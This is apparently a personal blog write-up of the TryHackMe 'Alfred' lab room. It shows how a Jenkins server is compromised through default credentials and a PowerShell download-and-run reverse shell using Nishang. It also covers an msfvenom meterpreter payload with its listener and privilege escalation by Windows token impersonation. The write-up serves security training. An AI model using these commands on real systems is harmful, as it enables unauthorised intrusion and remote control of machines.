TryHackMe: Alfred

·

7 min read

‘Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.'

I AM THE NIGHT

Hey everyone, Jin here, long time no blog! I popped in to see if there was any activity while I was hard-focused on studying for the eJPT and I found this little buddy all alone in the drafts. I mentioned I'd be writing a blog talking about that over on Twitter, but for now let's get this one shaped up and out the door while we're here, yes?

Onwards, to TryHackMe's Alfred room~

Task 1 - Initial Access

Today's box focuses on a misconfiguration in Jenkins, a tool used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they've made changes to it.

We'll start out with our usual nmap -A -p- 10.10.59.22 -vv to scan the machine while we read on. (While I was on LinkedIn, I was informed that this scan is really loud and could crash weaker networks. A better alternative would be to start with -sS on the standard ports and build from what we find there.)

This room wants us to use Nishang to gain initial access. This should be interesting, as I've never heard of or used Nishang before. But of course, that won't stop us from reaching our goal.

Question 1: How many ports are open? (TCP only)

It would seem that our usual scan is saying the host is down. But we know better. let's add -Pn to our scan so nmap doesn't check if the host is up or not. nmap -A -p- -Pn 10.10.59.22 -vv 108-1.png

The scan isn't quite finished yet, but we're only looking for TCP so it seems we have our answer.

Question 2: What is the username and password for the log in panel (in the format username:password)?

On port 80 we have a simple memorial page. 108-2.png

But our scan showed us port 8080. Navigating there, we get a login page. 108-3.png

Interesting. In the spirit of Occam's Razor, let's try logging in with admin:admin. 108-4.png

You know... I would have expected better from the house of the Bat. But here we are.

Question 3: Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port. You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

That's a big question. To answer it, let's click around. Let's start with that project, it seems interesting. 108-5.png

That takes us to this screen. 108-6.png

Okay. Let's head into the Workspace. 108-7.png

Here's what we get. 108-8.png

Doesn't seem like much is here. Ah, but, that Configure looks tasty. If things can be edited and pushed live, maybe there's a way to execute code in the Configure area. 108-9.png

We've got a good bit of stuff here. But if we click ‘Build’: 108-10.png

It seems we've hit the jackpot.

Before we go any further, we need to do some setting up. First, download the script mentioned in the task description. We can do that with wget on the raw page. wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 108-11.png

Then we open up a Python server in that same directory with the same command from the question. python3 -m http.server 108-12.png

Now that that's set up, we copy the command from the question and enter it in the command box in Jenkins. Don't forget to change the IP and port~ 108-13.png

But wait! Before you click ‘Apply’, make sure to set up your netcat session with nc -lvnp 4444.

... it didn't work. Let's try to figure out why. When we clicked ‘Apply’, we got Build #2 here. 108-14.png

Clicking Build 2, we come to this page. 108-15.png

If we click the Console Output tab, we get this. 108-16.png

Aha. We forgot to set our server info in the payload. Let's go do that. 108-17.png

Once we change that, it should work. 108-18.png

Make sure the top box is set to your server and the bottom box is set to your listener, then click ‘Save’ followed by ‘Build Now’ on the next screen. 108-19.png

As the build compiles, we get our shell! 108-20.png

Question 4: What is the user.txt flag?

In Windows, we can use dir to check the contents of directories, and chdir to change directories. 108-21.png

Get-Content allows us to see the contents of a file. User flag get. 108-22.png

And that completes Task 1~

Task 2 - Switching Shells

This task walks us through switching to a Metepreter shell. I won't get into all the details of the process because, well, someone's hard work and effort went into making this task so I'll leave it to them. I will however document the process.

First, we need to use the provided msfvenom command to generate a payload. Don't forget to change the necessary bits again~. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe 109-1.png

Question 1: What is the final size of the exe payload that you generated?

That would be some number of bytes that msfvenom tells you when it's done.

Now that that's made, I hope you've still got that server running. Hop over to your other reverse shell and upload the payload we just made with the following command: powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')" 109-2.png

We can dir just to make sure it downloaded, since there's no confirmation. Now before we run it, we need to set up our metasploit listener. Use msfconsole to get metasploit started, then the provided code to get the listener ready. use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [your-ip] set LPORT [listening-port] run 109-3.png

Now that that's running, we can run the payload waiting on the target machine. Start-Process "shell-name.exe" 109-4.png

If all went well... 109-5.png

We'll have our shell.

And that completes Task 2~

Task 3 - Privilege Escalation

Now that we're in, we're going to use token impersonation to gain system access. I'll be a little more verbose here, because in addition to being a write-up, these are my notes, and this I'm not very familiar with.

In short, Windows uses tokens to ensure accounts have the right privileges. They're usually assigned when users log in or are authenticated. This is usually done by LSASS.exe.

The access token consists of user SIDs(security identifier), group SIDs, privileges, and other things. More can be found at docs.microsoft.com/en-us/windows/win32/seca..

There are two types of access tokens: primary access tokens which are associated with a user account and are generated on log on, and impersonation tokens ehich allow a process or thread in a process to gain access to resources using the token of another user/client process. Almost like SUID in Linux.

There! With that out of the way, let's get to work.

The first question wants us to view all the privileges using whoami /priv. (If the meterpreter shell doesn't work, try the first one.) 110-1.png

Just like the next question says, SeDebugPrivilege and SeImpersonatePrivilege are enabled. Now we need to load incognito into meterpreter. 110-2.png

Question 3: To check which tokens are available, enter list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators token. What is the output when you run the getuid command?

Let's follow the question. First we list the tokens. 110-3.png

There's the admin token. Now let's impersonate it. 110-4.png

Lastly, the getuid command. 110-5.png

The next question explains that we may not actually have the permissions of a privileged user because what we can/can't do is determined by the primary token, not the impersonation token. So we need to migrate to a process with the correct permissions. First we ps to view all the processes. 110-6.png . . . 110-7.png

Then we migrate to the PID of services.exe with migrate 668 110-8.png

Question 5: read the root.txt file at C:\Windows\System32\config

Since we're in meterpreter, we can use things like cd and cat. 110-9.png

There's our root flag, and that completes the Alfred room~

Animated Series Batman Best Batman

It's been a while, but this was another room in the Offensive path. Once I get this eJPT I'll be coming back hard for this path, but for now I'll just keep studying.

That's all for now, see you in the next bit~